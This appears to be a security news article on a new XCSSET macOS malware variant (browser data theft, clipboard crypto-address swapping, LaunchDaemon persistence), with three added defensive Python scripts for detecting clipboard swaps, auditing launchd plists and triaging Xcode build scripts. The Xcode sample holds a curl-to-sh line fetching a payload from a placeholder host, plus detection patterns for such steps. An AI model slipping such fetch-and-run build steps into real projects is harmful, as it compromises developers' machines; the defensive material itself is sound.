
Microsoft Threat Intelligence reports that a new variant of the XCSSET macOS malware has been found in limited attacks, carrying several new features including expanded browser targeting, clipboard hijacking, and improved persistence mechanisms.
XCSSET is a modular macOS malware that acts as an infostealer and cryptocurrency stealer, taking notes, cryptocurrency wallets, and browser data from infected devices. It spreads by finding and infecting other Xcode projects on the device, so that the malware runs whenever one of those projects is built.
“XCSSET malware is designed to infect Xcode projects, which are usually used by software developers, and runs when an Xcode project is being built.”
“We assess that this method of infection and dissemination banks on project files being shared among developers of Apple or macOS-related applications.”
In the new variant observed by Microsoft, researchers noted several changes.
It now attempts to steal Firefox browser data by installing a modified build of the open-source HackBrowserData tool, which is used to decrypt and export browser data from the browser's data store.
The new version also includes an updated clipboard-hijacking component that monitors the macOS clipboard for regular-expression patterns matching cryptocurrency addresses.
When a crypto address is detected, it is replaced with an attacker-controlled address, so any cryptocurrency the infected user intended to send goes to the attackers instead.
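The substitution described above is visible from the defender's side as a clipboard value that changes on its own. The following script is an added example, not Microsoft's code and not XCSSET's: it models a polling clipboard monitor on a constructed timeline of snapshots and flags a copied address that is replaced, within a fraction of a second, by a different address of the same kind, while leaving two addresses copied seconds apart (normal user activity) alone. The address regexes and the two-second window are assumptions for illustration; the article does not list the patterns the malware itself uses.

```python
"""Detect clipboard address substitution (defender's view).

Added example; not code from Microsoft or from XCSSET. Each snapshot is
(seconds_since_start, clipboard_text). A hijack looks like a copied address
being replaced, almost immediately, by a different address of the same kind.
"""
import re
import subprocess
from typing import List, Optional, Tuple

# Address formats assumed for illustration; the article does not list the
# regexes XCSSET itself matches on.
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{11,71}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}

# A replacement faster than this is unlikely to be a human copy action (assumed).
SWAP_WINDOW_SECONDS = 2.0


def classify(text: str) -> Optional[str]:
    """Return which address kind `text` looks like, or None if it is not an address."""
    s = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(s):
            return kind
    return None


def detect_substitutions(snapshots: List[Tuple[float, str]]) -> List[dict]:
    """Compare consecutive snapshots and report suspected address swaps."""
    findings = []
    for (t0, before), (t1, after) in zip(snapshots, snapshots[1:]):
        before, after = before.strip(), after.strip()
        kind = classify(before)
        # Only an address -> different address of the same kind, within the window, counts.
        if kind is None or classify(after) != kind or before == after:
            continue
        if t1 - t0 <= SWAP_WINDOW_SECONDS:
            findings.append({"at": t1, "kind": kind, "original": before, "replacement": after})
    return findings


def read_clipboard_macos() -> str:
    """Live reading on macOS via the stock `pbpaste` tool (not used by the sample run)."""
    return subprocess.run(["pbpaste"], capture_output=True, text=True, check=False).stdout


# Constructed sample timeline: the user copies a BTC address and it is swapped
# 200 ms later; much later two ETH addresses are copied 15 s apart (benign).
SAMPLE_SNAPSHOTS = [
    (0.0, "meeting notes"),
    (1.0, "1UserAddrCopiedByVictimAAAAAAAAAA"),
    (1.2, "1AttackerSwappedAddrBBBBBBBBBBBBB"),
    (30.0, "0x" + "a" * 40),
    (45.0, "0x" + "b" * 40),
    (60.0, "done"),
]

if __name__ == "__main__":
    for f in detect_substitutions(SAMPLE_SNAPSHOTS):
        print(f"t={f['at']}s {f['kind']}: {f['original']} -> {f['replacement']}")
```

To run it live, call `read_clipboard_macos()` on a timer, append `(time.monotonic(), text)` to a list whenever the value changes, and feed the list to `detect_substitutions()`; the sample run above only uses the constructed timeline.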

Source: Microsoft
The malware also includes new persistence methods, such as creating LaunchDaemon entries that execute a ~/.root payload and planting a fake System Settings in /tmp to disguise its activity.
The new variant is not yet widespread, and Microsoft reports having seen it only in limited attacks. The researchers have shared their findings with Apple and are working with GitHub to take down the associated repository.
To protect against this type of malware, keep macOS and apps up to date, especially since XCSSET has previously exploited vulnerabilities, including zero-days.
Microsoft also recommends that developers always inspect Xcode projects before building them, especially when they were shared by others.
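Persistence through launchd leaves a property list on disk, which is the easiest place to look for it. The script below is an added example (not Microsoft's code, and the label and paths in its sample plists are placeholders, not indicators from the article): it parses launchd plists with `plistlib` and reports any program argument that points into /tmp or /private/tmp, or at a dot-file or dot-directory directly under a user's home, which is where a ~/.root payload would live once launchd-style absolute paths are used (launchd does not expand `~`). It also walks the standard LaunchAgents/LaunchDaemons directories when run on a Mac.

```python
"""Audit launchd property lists for payloads run from /tmp or hidden home items.

Added example; not Microsoft's or the malware's code. Sample plists are
constructed inline with placeholder labels and paths.
"""
import os
import plistlib
import re
from typing import Dict, List

LAUNCHD_DIRS = [
    os.path.expanduser("~/Library/LaunchAgents"),
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
]

# A path to a dot-file/dot-directory directly under a home directory (e.g. /Users/x/.root).
HIDDEN_HOME_ITEM = re.compile(r"^(?:~|/Users/[^/]+|/var/root)/\.[^/]")
TMP_ITEM = re.compile(r"^(?:/private)?/tmp/")


def suspicious_reasons(argument: str) -> List[str]:
    """Inspect one Program/ProgramArguments value. `sh -c "..."` strings are split
    on whitespace so paths embedded in a command line are seen as well."""
    reasons = []
    for word in argument.split():
        if TMP_ITEM.match(word):
            reasons.append(f"runs from temporary directory: {word}")
        elif HIDDEN_HOME_ITEM.match(word):
            reasons.append(f"runs hidden item under a home directory: {word}")
    return reasons


def audit_plist(data: bytes) -> Dict[str, object]:
    """Parse one launchd plist and return its label, RunAtLoad flag and any reasons."""
    plist = plistlib.loads(data)
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    if "Program" in plist:
        args.insert(0, str(plist["Program"]))
    reasons = [r for a in args for r in suspicious_reasons(a)]
    return {
        "label": plist.get("Label", "<no label>"),
        "run_at_load": bool(plist.get("RunAtLoad", False)),
        "reasons": reasons,
    }


def audit_directories(dirs=LAUNCHD_DIRS) -> List[Dict[str, object]]:
    """Audit every .plist in the launchd directories that exist on this machine."""
    results = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".plist"):
                continue
            path = os.path.join(d, name)
            try:
                with open(path, "rb") as fh:
                    result = audit_plist(fh.read())
            except Exception as exc:  # binary-corrupt or non-plist files still get reported
                result = {"label": name, "run_at_load": False, "reasons": [f"unparseable: {exc}"]}
            result["path"] = path
            results.append(result)
    return results


# Constructed sample plists (placeholder label/paths, not indicators from the article).
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.placeholder</string>
  <key>ProgramArguments</key>
  <array><string>/bin/sh</string><string>-c</string><string>/Users/dev/.root</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key>
  <array><string>/usr/local/bin/backup</string><string>--nightly</string></array>
  <key>StartInterval</key><integer>86400</integer>
</dict></plist>"""

if __name__ == "__main__":
    for data in (SUSPICIOUS_PLIST, BENIGN_PLIST):
        print(audit_plist(data))
    for r in audit_directories():
        if r["reasons"]:
            print(r)
```

The path heuristics are deliberately narrow so that a clean machine produces no noise; a hit is a reason to read the plist and the file it points at, not proof of infection on its own.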
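"Inspect the project before building it" is concrete advice once you know that an Xcode project's shell-script build phases run on every build. The script below is an added example, not Microsoft's code, and it does not claim to show where XCSSET places its payload (the article only says the malware runs when an infected project is built); it lists the Run Script phases in a `project.pbxproj` and flags ones that download from the network, decode an encoded blob, `eval` generated text, call `osascript`, or touch /tmp. Because `project.pbxproj` is an old-style (NeXTSTEP) plist that `plistlib` cannot read, the entries are extracted with regular expressions. The sample project text and the heuristics are constructed for illustration.

```python
"""List and triage the Run Script build phases of an Xcode project.

Added example; not Microsoft's code. The sample pbxproj fragment and the
suspicion heuristics are constructed for illustration.
"""
import os
import re
from typing import Dict, List

PHASE_BLOCK = re.compile(r"isa = PBXShellScriptBuildPhase;(.*?)\n\s*\};", re.S)
NAME_FIELD = re.compile(r'name = (?:"((?:[^"\\]|\\.)*)"|([^;]+));')
SCRIPT_FIELD = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')

# Traits that make a build script worth a human look (assumed, not from the article).
SUSPICIOUS = [
    ("downloads from the network", re.compile(r"\b(curl|wget)\b")),
    ("decodes an encoded payload", re.compile(r"\bbase64\b.*\s(-d|-D|--decode)\b")),
    ("evaluates generated code", re.compile(r"\beval\b")),
    ("runs AppleScript", re.compile(r"\bosascript\b")),
    ("touches a temp directory", re.compile(r"(?:/private)?/tmp/")),
]


def unescape(s: str) -> str:
    # pbxproj strings escape newline, tab, quote and backslash with a backslash.
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def extract_script_phases(pbxproj: str) -> List[Dict[str, object]]:
    """Return every shell-script build phase with its name, decoded script and flags."""
    phases = []
    for block in PHASE_BLOCK.finditer(pbxproj):
        body = block.group(1)
        name_m = NAME_FIELD.search(body)
        script_m = SCRIPT_FIELD.search(body)
        name = (name_m.group(1) or name_m.group(2)).strip() if name_m else "<unnamed>"
        script = unescape(script_m.group(1)) if script_m else ""
        flags = [why for why, pat in SUSPICIOUS if pat.search(script)]
        phases.append({"name": name, "script": script, "flags": flags})
    return phases


def inspect_project(xcodeproj_dir: str) -> List[Dict[str, object]]:
    """Read <Name>.xcodeproj/project.pbxproj from disk and triage it."""
    with open(os.path.join(xcodeproj_dir, "project.pbxproj"), encoding="utf-8") as fh:
        return extract_script_phases(fh.read())


# Constructed pbxproj fragment: one benign lint phase and one that pipes a download into sh.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
        A1B2C3 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Lint";
            shellPath = /bin/sh;
            shellScript = "swiftlint --quiet\n";
        };
        D4E5F6 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "echo \"building\"\ncurl -s http://example.invalid/stage | sh\n";
        };
/* End PBXShellScriptBuildPhase section */
'''

if __name__ == "__main__":
    for phase in extract_script_phases(SAMPLE_PBXPROJ):
        marker = "!" if phase["flags"] else " "
        print(f"[{marker}] {phase['name']}: {', '.join(phase['flags']) or 'nothing flagged'}")
```

Build-phase scripts are only one place build-time code can hide; treat this as the first check in a review of a shared project, not the whole of it.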


